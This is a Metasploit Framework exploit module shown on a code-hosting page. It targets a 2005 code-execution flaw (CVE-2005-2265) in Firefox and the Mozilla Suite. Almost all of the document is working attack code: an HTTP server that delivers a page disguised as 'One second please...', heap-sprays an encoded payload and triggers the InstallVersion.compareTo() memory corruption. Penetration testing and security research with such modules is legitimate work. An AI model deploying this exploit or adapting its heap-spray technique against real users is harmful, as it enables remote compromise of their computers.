Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/mozilla_compareto.rb
31484 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  # include Msf::Exploit::Remote::BrowserAutopwn

15
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10

16
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.

17
  # autopwn_info({

18
  #  :ua_name => HttpClients::FF,

19
  #  :ua_minver => "1.0",

20
  #  :ua_maxver => "1.7.10",

21
  #  :os_name => OperatingSystems::Match::WINDOWS,

22
  #  :javascript => true,

23
  #  :rank => NormalRanking, # reliable memory corruption

24
  #  :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",

25
  # })

26


27
  def initialize(info = {})

28
    super(

29
      update_info(

30
        info,

31
        'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',

32
        'Description' => %q{

33
          This module exploits a code execution vulnerability in the Mozilla

34
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit

35
          module is a direct port of Aviv Raff's HTML PoC.

36
        },

37
        'License' => MSF_LICENSE,

38
        'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],

39
        'References' => [

40
          ['CVE', '2005-2265'],

41
          ['OSVDB', '17968'],

42
          ['BID', '14242'],

43
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],

44
        ],

45
        'Payload' => {

46
          'Space' => 400,

47
          'BadChars' => "\x00"

48
        },

49
        'Targets' => [

50
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on

51
          # WinXP-SP3 and Win2kAS-SP0

52
          [

53
            'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',

54
            {

55
              'Platform' => 'win',

56
              'Arch' => ARCH_X86,

57
              'Ret' => 0x0c0c0c0c

58
            }

59
          ],

60
        ],

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '2005-07-13',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70
  end

71


72
  def on_request_uri(cli, _request)

73
    # Re-generate the payload

74
    return if ((p = regenerate_payload(cli)).nil?)

75


76
    print_status("Sending #{name}")

77
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

78


79
    # Handle the payload

80
    handler(cli)

81
  end

82


83
  def generate_html(payload)

84
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

85
    Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

86


87
    sprintf('0x%.8x', target.ret)

88
    Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))

89
    Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))

90
    eax_address = sprintf('0x%.8x', target.ret)

91


92
    return %|

93
<html>

94
<head>

95
<!--

96
  Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)

97
  From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx

98
  Greets: SkyLined, The Insider and shutdown

99
-->

100
  <title>One second please...</title>

101
  <script language="javascript">

102


103
    function BodyOnLoad()

104
    {

105
      location.href="javascript:void (new InstallVersion());";

106
      CrashAndBurn();

107
    };

108


109
    #{js_heap_spray}

110
    // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology

111
    function CrashAndBurn()

112
    {

113
      // Payload - Just return..

114
      var payLoadCode=unescape("#{enc_code}");

115


116
      // Size of the heap blocks

117
      var heapBlockSize=0x400000;

118
      sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

119


120
      // Set address to fake "pdata".

121
      var eaxAddress = #{eax_address};

122


123
      //	This was taken from shutdown's PoC in bugzilla

124
      // struct vtbl { void (*code)(void); };

125
      // struct data { struct vtbl *pvtbl; };

126
      //

127
      // struct data *pdata = (struct data *)(xxAddress & ~0x01);

128
      // pdata->pvtbl->code(pdata);

129
      //

130
      (new InstallVersion).compareTo(new Number(eaxAddress >> 1));

131
    }

132
// -->

133
  </script>

134
</head>

135
<body onload="BodyOnLoad()">

136
</body>

137
</html>

138
    |

139
  end

140
end

141


142